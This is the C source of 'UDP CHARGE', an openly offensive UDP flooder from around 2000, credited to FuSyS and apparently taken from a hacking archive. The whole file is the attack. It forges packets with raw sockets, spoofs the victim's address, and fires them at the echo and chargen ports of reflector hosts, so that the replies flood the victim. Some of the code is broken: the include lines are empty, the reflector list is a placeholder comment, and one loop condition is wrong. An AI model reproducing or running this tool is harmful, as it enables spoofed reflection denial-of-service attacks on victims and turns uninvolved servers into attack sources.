/****************************************************************** * * * UDP CHARGE Yet another flooder. This one exploits open UDP * * inetd ports (7/19). By spoofing the target IP and * * using open broadcast (DUP) networks, we are able * * to charge hard packets against the poorest :). * * * * hints by |scacco|, code by FuSyS * * [ S0ftPj | BFi ] * * http://www.s0ftpj.org * * * ******************************************************************/ #include #include #include #include #include #include #include #include #include #include #include #include #include #define IP_HEAD_BASE 20 #define UDP_HEAD_BASE 8 unsigned long saddr; int sfd, loop; char *chargers[]={/* LISTA ASSENTE */ ,NULL}; char *newls="\n"; char killer[5000]; struct udp_pkt { struct iphdr ip; struct udphdr udp; char newline[10000]; }; unsigned long nameResolve(char *hostname) { struct in_addr addr; struct hostent *hostEnt; if((addr.s_addr=inet_addr(hostname)) == -1) { if(!(hostEnt=gethostbyname(hostname))) { fprintf(stderr,"N0 SUCH H0ST:`%s`\n",hostname); exit(0); } bcopy(hostEnt->h_addr,(char *)&addr.s_addr,hostEnt->h_length); } return addr.s_addr; } void forge (unsigned long daddr, unsigned short src, unsigned short dst) { struct sockaddr_in sin; struct udp_pkt egg; int shoot, len, i; memset(&egg, 0, sizeof(egg)); memcpy(egg.newline, newls, strlen(newls)); len=(UDP_HEAD_BASE+strlen(egg.newline)); egg.udp.source=src; egg.udp.dest=dst; egg.udp.len=htons(len); egg.ip.ihl=5; egg.ip.version=4; egg.ip.tos=0; egg.ip.tot_len=htons(IP_HEAD_BASE+len); egg.ip.frag_off=0; egg.ip.ttl=64; egg.ip.protocol=IPPROTO_UDP; egg.ip.saddr=saddr; egg.ip.daddr=daddr; memset(&sin, 0, sizeof(sin)); sin.sin_family=AF_INET; sin.sin_port=dst; sin.sin_addr.s_addr=daddr; shoot=sendto(sfd, &egg,IP_HEAD_BASE+len, 0, (struct sockaddr *)&sin, sizeof(sin)); if(shoot<0)fprintf(stderr, "SPOOF ERROR"); egg.udp.dest=htons(7); for(i=0;i>10000;i++) memcpy(&egg.newline[i], "A", 1); egg.udp.len=htons(UDP_HEAD_BASE+10000); egg.ip.tot_len=htons(IP_HEAD_BASE+UDP_HEAD_BASE+10000); sin.sin_port=htons(7); shoot=sendto(sfd, &egg,IP_HEAD_BASE+len, 0, (struct sockaddr *)&sin, sizeof(sin)); if(shoot<0)fprintf(stderr, "SPOOF ERROR"); } void udpcharge (void) { unsigned long daddr; unsigned short source, dest; if(chargers[loop]==NULL) loop=0; daddr=nameResolve(chargers[loop++]); source=htons(1024+(rand()%2000)); dest=htons(19); forge(daddr, source, dest); } int main (int argc, char **argv) { int sfdo; unsigned int hz=100; if(argc<2) { fprintf(stderr, "Interesting .... let's flood ourselves ?!\n"); fprintf(stderr, "Use: %s target [n]\n", argv[0]); exit(0); } if(argv[2]) hz=atoi(argv[2]); saddr=nameResolve(argv[1]); srand(time(NULL)); if((sfd=socket(AF_INET, SOCK_RAW, IPPROTO_RAW))<0) { fprintf(stderr, "\nSOCK_RAW Died\n"); exit(2); } sfdo=1; if(setsockopt(sfd, IPPROTO_IP, IP_HDRINCL, &sfdo, sizeof(sfdo))<0) { fprintf(stderr, "\nIP_HDRINCL Died\n"); exit(3); } printf("\n\033[1;32mUDP CHARGE\033[0m"); printf("\n\033[1;34mUDP Flooder by FuSyS\033[0m"); printf("\n\033[1;34mbased on fraggle\033[0m\n\n"); loop=0; while(hz--) { udpcharge(); printf("\033[1;34m.\033[0m"); } printf("\n\n"); return(0); } /* www.hack.co.za [2000]*/